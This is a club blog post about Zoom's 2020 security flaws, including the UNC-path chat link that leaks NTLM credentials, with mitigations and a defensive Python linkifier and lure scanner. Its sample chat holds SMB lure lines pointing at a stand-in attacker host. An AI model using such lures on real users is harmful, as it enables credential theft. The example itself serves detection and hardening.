Tuesday, March 31, 2020

zoom

 The computer club mentioned Zoom as an app for free video conferencing during the stay-at-home period.

 Trading in Zoom Technologies (ticker ZOOM) stock was halted after the stock soared 56,000%. Wrong Zoom: that company has nothing to do with the video-conferencing app.

 Zoom, the video-conferencing app, has seen a large increase in use recently: from 10 million daily meeting participants to 300 million.

 Helpful <-> Harmful

 The Zoom installer for macOS installs the app without the user ever approving the installation: the actual install runs from the package's pre-install script, before the user reaches the installer's Install button.

Though not illegal or against Apple's terms and conditions, this is not normal behavior for an application, and it is the technique that malware installers use.
Zoom also allowed other web sites to turn on the user's webcam through the Zoom application (a web page could drop a visitor straight into a meeting with video on). Zoom said it would remove that feature.

 Also, the app and Zoom's marketing said meetings use end-to-end encryption. Not quite. What Zoom used is transport encryption: the connection between each client and Zoom's servers is encrypted, but the meeting content is decrypted on Zoom's servers.
Zoom can see the data. With true end-to-end encryption only the participants hold the keys, and the service in the middle cannot read the content.

This post is not advice against using Zoom; it is an attempt to inform and make members aware so they can prepare.


Added 01-Apr-2020

 Here is a link to a Zoom blog post on securing a virtual classroom:

Also, there are reports of zoombombing: uninvited people joining an active Zoom session and broadcasting inappropriate images, videos, hate speech, etc. into it. Meetings that anyone with the meeting ID can join are the easy targets.


The Zoom Windows client converts UNC paths (\\server\share) typed into a meeting's chat into clickable links. Good for convenience, bad for security.

If a user clicks such an SMB link, Windows opens a connection to that server and automatically authenticates with the user's login name and an NTLM challenge-response computed from the user's password hash. Whoever controls that server (or captures the traffic to it) can feed the captured response to a password-cracking tool and recover the user's password, or relay it to another service. Note that this happens on a direct connection from the user's PC to the attacker's server, outside the Zoom session, so Zoom's own encryption, end-to-end or not, makes no difference here. Independently of any Zoom fix, Windows administrators can block this class of leak with the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" set to Deny all, and by blocking outbound TCP port 445 at the network perimeter.
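The two paragraphs above describe a linkifier that is too generous and the SMB lure it enables. The following is an added example, not code from the original post or from Zoom: it models a naive chat linkifier beside a hardened one, and a small scanner that flags chat lines whose links would make a Windows client open an SMB connection. The function names, the regular expressions and the chat log are all constructed for this example.

```python
"""
Added example (not Zoom's code): a naive chat linkifier that turns UNC paths
into clickable links, the hardened version that only links http(s) URLs, and
a scanner that flags chat lines carrying SMB lures. All names and the sample
chat log below are constructed for this example.
"""
import re
from urllib.parse import urlsplit

# Regex fragments (constructed): an http(s) URL, and a UNC path of the form
# \\host\share\more...  (two leading backslashes, then backslash-separated parts).
_HTTP_URL = r"https?://[^\s<>]+"
_UNC_PATH = r"\\\\[^\\\s]+(?:\\[^\\\s]*)*"

# Naive client: anything that looks like a URL *or* a UNC path becomes a link.
_NAIVE_LINK = re.compile(rf"(?P<url>{_HTTP_URL})|(?P<unc>{_UNC_PATH})")
# Hardened client: only explicit http/https URLs are candidates.
_SAFE_LINK = re.compile(_HTTP_URL)
# file:// URLs with a host also make Windows try SMB; the scanner checks them too.
_FILE_URL = re.compile(r"file://[^\s<>]+")


def find_links_naive(message):
    """Everything the naive client would render as clickable (URLs and UNC paths)."""
    return [m.group(0) for m in _NAIVE_LINK.finditer(message)]


def find_links_safe(message):
    """Hardened linkifier: only http/https URLs with a real host become links.

    UNC paths and file:// URLs are left as plain text, so a click can never
    trigger an SMB connection from inside the chat window.
    """
    links = []
    for m in _SAFE_LINK.finditer(message):
        if urlsplit(m.group(0)).hostname:
            links.append(m.group(0))
    return links


def smb_lure_hosts(message):
    """Hosts a Windows client would open an SMB connection to if a link in
    this message were clicked: the host part of each UNC path, plus the host
    of any file:// URL that names one (file:///C:/... names no host)."""
    hosts = []
    for m in re.finditer(_UNC_PATH, message):
        hosts.append(m.group(0)[2:].split("\\")[0])   # strip leading \\, keep host
    for m in _FILE_URL.finditer(message):
        host = urlsplit(m.group(0)).hostname
        if host:
            hosts.append(host)
    return hosts


# Constructed sample of an exported meeting chat, not a real transcript.
CHAT_LOG = [
    "10:01 Alice: agenda is at https://example.com/agenda",
    r"10:02 Mallory: slides here \\attacker.example\share\slides.pptx",
    "10:03 Bob: thanks",
    "10:04 Mallory: or try file://attacker.example/share/slides.pptx",
]


def scan_chat(lines):
    """Return (line, hosts) for every chat line that carries an SMB lure."""
    findings = []
    for line in lines:
        hosts = smb_lure_hosts(line)
        if hosts:
            findings.append((line, hosts))
    return findings


if __name__ == "__main__":
    for line, hosts in scan_chat(CHAT_LOG):
        print(f"SMB lure -> {hosts}: {line}")
    print("naive:", find_links_naive(CHAT_LOG[1]))   # UNC path becomes a link
    print("safe: ", find_links_safe(CHAT_LOG[1]))    # nothing to click
```

The hardened linkifier is an allow-list (only http and https), not a deny-list of known-bad patterns; that is the design choice that matters, because Windows has more than one way to be talked into SMB (UNC paths, file:// URLs, WebDAV) and a deny-list tends to miss the next one. The scanner is the same logic turned into a detection: run it over an exported chat to find who posted the lure.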

In my opinion, Zoom is like almost everything in today's cyber environment: good for us as long as users are aware, so they can prepare and understand the risk to balance against the reward.
I would use Zoom. You should make the decision for your circumstances.

Zoom now says it will address these issues.
And so it has!

A screenshot of a British cabinet meeting posted on social media showed the Zoom meeting ID. Presumably not intended as an invitation to eavesdrop, but a meeting ID is all an uninvited guest needs when no password or waiting room is set.


Update  3-Apr-2020

Update   4-Apr-2020
 Zoom is actively and quickly addressing security concerns. I have little reservation about using Zoom for casual use. Steps can be taken to make Zoom sessions safer, not safe.

Update: 14-Apr-2020
 Zoom now hides the meeting ID from the client's title bar. Users who shared screenshots on social media could have had their meeting joined by strangers if the meeting's security settings were lax. Soon users will be able to choose which regions their meeting traffic is routed through.
Zoom is actively and aggressively improving both its security and its usability.

Update: 24-Apr-2020
 Zoom continues to amaze with its response to security and privacy issues, in a very good way.
Explosive growth, becoming an abuse target, new features: all are being handled in a way that gives other platforms a lesson in product management.
 But 500,000 Zoom account credentials (e-mail addresses, passwords, personal meeting URLs and host keys) were on sale on a dark-web site; most were collected by credential stuffing with passwords leaked in earlier, unrelated breaches, so anyone who reused a password on Zoom should change it. Zero-day exploits for Zoom were also reportedly on sale, with the Windows one priced at $500,000, a figure the reporting said researchers considered inflated for what the bug could do.

Update: 27-Apr-2020
 Zoom version 5.0 is available, with a lot of improvement.

  It adds AES 256-bit GCM encryption for meeting content. All accounts are to be moved to GCM system-wide on 30-May-2020. (Re)visit the Zoom download page to upgrade to version 5.0.
